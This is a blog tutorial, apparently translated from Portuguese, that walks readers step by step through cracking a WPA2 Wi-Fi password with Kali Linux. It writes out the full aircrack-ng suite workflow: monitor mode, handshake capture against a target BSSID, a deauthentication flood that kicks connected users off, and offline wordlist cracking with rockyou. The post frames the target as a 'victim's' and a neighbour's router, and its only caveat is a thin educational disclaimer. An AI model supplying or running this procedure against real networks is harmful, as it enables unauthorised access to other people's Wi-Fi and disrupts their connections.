As promised, the “hacker series of posts” begins, it will start with everything being simple, then maybe we’ll advance a little.
We start with a tutorial that will help (and hurt) a lot of people. Well, depending on your purpose this tutorial can bring you knowledge (which is the purpose of the post), perks, if you feel like it galaxy spike hacker and bring you, of course, the desired Wi-Fi password.
OBS: From now on, Lucas Zarzur and the portal/page and facebook group Ciência da Computação us we exempt of any responsibilities for the acts that you may commit, as already said this post has an educational purpose.
Okay, without further ado, here we go:
It is true that when using WPA2 encryption we want to obtain greater security in relation to our passwords, but like everything on the internet, it is not completely secure and this tutorial will only prove one way (among many others, I will address others in future posts) how to hack Wi -Fi WPA2 with Kali Linux.
Step 1: You must have Kali Linux at hand, if you don’t have it, download it by clicking here and choose the best option for you (download in ISO or TORRENT).
Step 2: Now that Kali is downloaded, you must make a bootable USB stick (click here to find out how), as it is the most effective way to recognize the routers.
Step 3: Now you should just run Kali Linux by choosing “Live (amd64)“, as shown in image 1 below:
Picture 1
Step 4: Kali will open, now open the terminal just by typing Ctrl + Alt + T, or simply by clicking on it, as shown in image 2 below:
Picture 2
Step 5: Time for the interesting part! Enter the command ifconfig and give enter, in order to know what is the name of your router. It will usually be wlan0 as shown in image 3 below:
Image 3
Step 6: Use the command airmon-ng check kill to close unwanted processes:
Image 4
Step 7: Now is the time to make your wirelles card stay in monitoring mode so you can see all the information traffic between the routers and devices connected to them, so we create a virtual network interface with the command airmon-ng start wlan0
Picture 5
Step 8: Now we will actually do the complete reading of the information previously collected through monitoring with the command airodump-ng wlan0mon:
Image 6
I will not go into details of all the information that appears, for now it is important to know that BSSID and the MAC-Address of the device, which in our case is the “victim’s” router, PWR It is how close you are at the router (it is important to know that you cannot be far away, it has to be close) and CH you mean the canal where the router is:
Image 7
OBS²: Check if the router you want to carry out the attack has WPS blocked, it is necessary that NO for this attack to take place. Run the following command to verify: wash -l wlan0mon.
Step 9: It’s time to attack! Let’s capture the main information that travels from the router with the command airodump-ng –bssid DESIRED_BSSID -c DESIRED_ROUTER_CHANNEL –write NAME_FILE_TO_WRITE_INFORMATION_DO_ROTEADOR wlan0mon. Don’t get confused, take as an example: airodump-ng –bssid 84:AF:1S:4F:5F:AC -c 11 –write Teste2 wlan0mon where 84:AF:1S:4F:5F:AC was the BSSID of the router I want to get the password from; 11 is the channel the router is on; Teste2 is the name of the file I created (remember it doesn’t matter what name you give it). See example in image 8 below:
Figure 8
And then we will have the following result:
Picture 9
Step 10: In another terminal we will use the command aireplay-ng –deauth 100 -a DESIRED_BSSID wlan0mon for authenticated users to log out, and for them to re-authenticate themselves, capturing the password in the process. Enter the command and wait for the process to end:
Picture 10
If we go back to the terminal where airodump-ng is running, we notice that in the upper right corner it now says “WPA handshake“, this shows us that the encrypted password was captured, it is the big step for us to achieve the desired:
Image 11
Step 11: This step is not mandatory, it will serve as proof that the process really works. Let me explain: This process works in a way to try several passwords from a list (a text file with millions of passwords), and these lists can be downloaded from the internet or simply use the Kali Linux standard called rockyou, which is located in the directory /usr/share/wordlists/rockyou.txt.gz. In this step I created a list called example_wordlist with some random passwords and my password inside, and placed the file in Kali’s wordlists directory:
Image 12
Step 12: Yes, this step is mandatory. In the final step, the command aircrack-ng NAME_FILE_TO_WRITE_INFORMATION_DO_ROTEADOR -w /usr/share/wordlists/NOME_WORDLIST will perform the attack:
Picture 13
As we can see in image 14 below, the password has been located. Yes, the neighbor’s router password is 987654321! :S
Picture 14
Well, that’s it! This is one of the ways to hack Wi-Fi with WPA2 encryption, others will be posted later and soon a video of this version will be created and posted for better understanding! ????
This procedure is somewhat time consuming and this will depend on your computer and the wordlist you have. I advise you to carry out the tests at a time when the computer is not needed, since the internet will be disabled during the entire process, as it tries to connect to the Wi-Fi of the attack, in addition to being a process that can (and should) take hours.
I hope you enjoyed it and test it for your knowledge, and any doubt, criticism and/or praise can post there in the comments.
Share and never forget: knowledge is not a crime, a crime is not sharing it!
Until later!